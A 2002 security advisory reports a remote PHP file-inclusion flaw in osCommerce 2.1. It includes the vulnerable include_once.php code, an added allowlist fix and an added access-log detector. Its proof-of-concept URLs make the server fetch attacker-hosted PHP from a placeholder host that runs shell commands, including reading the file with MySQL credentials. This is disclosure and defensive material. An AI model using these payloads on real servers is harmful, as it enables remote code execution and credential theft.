[UNIX] PHP Source Injection in osCommerce
From: support@securiteam.com
To: list@securiteam.com
Date: Tue, 18 Jun 2002 18:42:33 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
PHP Source Injection in osCommerce
------------------------------------------------------------------------
SUMMARY
<http://www.oscommerce.com> osCommerce is an open source e-commerce
solution under ongoing development by the open source community. Its
feature-packed out-of-the-box installation allows store owners to set up,
run, and maintain their online stores with minimum effort and at no
cost. A security vulnerability in the product allows attackers to make the
program include third-party PHP code into its existing code base, thus
causing arbitrary execution of malicious code.
DETAILS
Vulnerable systems:
* osCommerce Preview Release 2.1
osCommerce comes with a file called /catalog/includes/include_once.php
that looks like this:
-------- include_once.php --------
<?
if (!defined($include_file . '__')) {
define($include_file . '__', 1);
include($include_file);
}
?>
----------------------------------
If someone requests a URL like:
http://SERVER/catalog/includes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE
he would be able to include any code he wants, because the include_file
parameter is passed to include() without any validation.
This could be a serious problem because this user could query the SQL
server and get access to other important files...
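The root cause is that a request parameter is used directly as the argument to include(), so it can name any local file or, with PHP's URL wrappers enabled, any remote one. The following is an added example, not osCommerce code and not the vendor's fix (which the advisory says was still being worked on): the request parameter is used only as a key into a fixed allowlist of include targets, so no caller-supplied path or URL ever reaches include(). The file names in the allowlist are assumed for illustration; the code assumes PHP 7.1 or later.

```php
<?php
// Added example, not osCommerce code: an allowlisted replacement for the
// include_once.php dispatcher. The request parameter selects a key in a
// fixed map, so no caller-supplied path or URL ever reaches include().

// Assumed allowlist: logical names -> files inside the application tree.
const ALLOWED_INCLUDES = [
    'application_top' => __DIR__ . '/application_top.php',
    'header'          => __DIR__ . '/header.php',
    'footer'          => __DIR__ . '/footer.php',
];

/**
 * Resolve a requested include name to a local path, or null if it is not
 * on the allowlist. A URL, a path with slashes, or a raw file name with an
 * extension cannot equal any key, so those inputs are rejected implicitly.
 */
function resolve_include(string $requested): ?string
{
    return ALLOWED_INCLUDES[$requested] ?? null;
}

/**
 * Include the allowlisted file, or answer 400 and log the refused value.
 * PHP's own include_once replaces the hand-rolled define() guard.
 */
function include_once_safe(string $requested): void
{
    $path = resolve_include($requested);
    if ($path === null) {
        http_response_code(400);
        error_log('include_once_safe: rejected include_file=' . $requested);
        return;
    }
    include_once $path;
}

if (PHP_SAPI !== 'cli') {
    // Normal web request: dispatch on the (untrusted) query parameter.
    include_once_safe((string)($_GET['include_file'] ?? ''));
} else {
    // Constructed inputs for a quick command-line check of the resolver.
    $probes = ['header', 'http://MYBOX/a.php', 'application_top.php', ''];
    foreach ($probes as $in) {
        printf("%-25s => %s\n", "'" . $in . "'", resolve_include($in) ?? 'rejected');
    }
}
```

Run from the command line, only 'header' resolves; the remote URL, the raw file name and the empty string are all rejected. As defence in depth, setting allow_url_fopen=Off in php.ini (and, on PHP 5.2 and later, allow_url_include=Off) blocks the remote-URL variant of this attack at the interpreter level, but it does nothing against inclusion of local files, so the allowlist is the actual fix and the ini setting is only a second layer.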
Examples:
1) Directory listing
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php
--- a.php ---
<? passthru("/bin/ls")?>
-------------
Would result in a directory listing of the current directory.
2) File viewing
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/b.php
--- b.php ---
<? passthru("/bin/cat application_top.php")?>
-------------
Would display the contents of the application_top.php file (which includes
the MySQL username, password, etc.).
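Both examples above leave a clear trace in the web server's access log: a request to include_once.php whose include_file value carries a URL scheme. The following is an added example (not part of the advisory) of a log check that flags such requests, whether the value is sent plainly or percent-encoded. The log lines are constructed in Apache common format, and the file and parameter names come from the advisory; the heuristic assumes that legitimate include names are bare file names without a scheme or path separator.

```php
<?php
// Added example, not from the advisory: flag access-log entries whose
// include_file parameter to include_once.php carries a URL scheme or a
// path separator. Sample lines below are constructed, Apache common format.

const SAMPLE_LOG = <<<'LOG'
10.0.0.5 - - [18/Jun/2002:18:42:33 +0200] "GET /catalog/includes/include_once.php?include_file=header HTTP/1.0" 200 512
10.0.0.9 - - [18/Jun/2002:18:43:01 +0200] "GET /catalog/includes/include_once.php?include_file=http://MYBOX/a.php HTTP/1.0" 200 1733
10.0.0.9 - - [18/Jun/2002:18:43:07 +0200] "GET /catalog/includes/include_once.php?include_file=http%3A%2F%2FMYBOX%2Fb.php HTTP/1.0" 200 2048
10.0.0.7 - - [18/Jun/2002:18:44:10 +0200] "GET /catalog/default.php HTTP/1.0" 200 9871
LOG;

/**
 * Return suspicious requests as [client IP, decoded include_file] pairs.
 * Only requests to include_once.php with an include_file parameter are
 * examined; a value is suspicious if it starts with a URL scheme or
 * contains a slash or backslash.
 */
function find_suspicious_includes(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Client IP and request target from the common log format.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;
        }
        $ip = $m[1];
        $target = $m[2];

        $qpos = strpos($target, '?');
        if ($qpos === false) {
            continue;
        }
        $path = substr($target, 0, $qpos);
        $query = substr($target, $qpos + 1);
        if (substr($path, -strlen('/include_once.php')) !== '/include_once.php') {
            continue;
        }

        // parse_str percent-decodes, so the encoded variant is caught too.
        parse_str($query, $params);
        $value = (string)($params['include_file'] ?? '');
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value) || strpbrk($value, '/\\') !== false) {
            $hits[] = [$ip, $value];
        }
    }
    return $hits;
}

foreach (find_suspicious_includes(SAMPLE_LOG) as [$ip, $value]) {
    printf("ALERT %s requested include_file=%s\n", $ip, $value);
}
```

On the constructed sample this reports the two requests from 10.0.0.9 (the plain and the percent-encoded remote URL) and ignores the legitimate 'header' include and the unrelated page. The path-separator check also catches attempts to pull in local files from other directories, which the scheme check alone would miss.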
Vendor response:
The vendor has been informed and is currently working on a fix.
ADDITIONAL INFORMATION
The information has been provided by
<mailto:Tim.Vandermeersch@pandora.be> Tim Vandermeersch.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.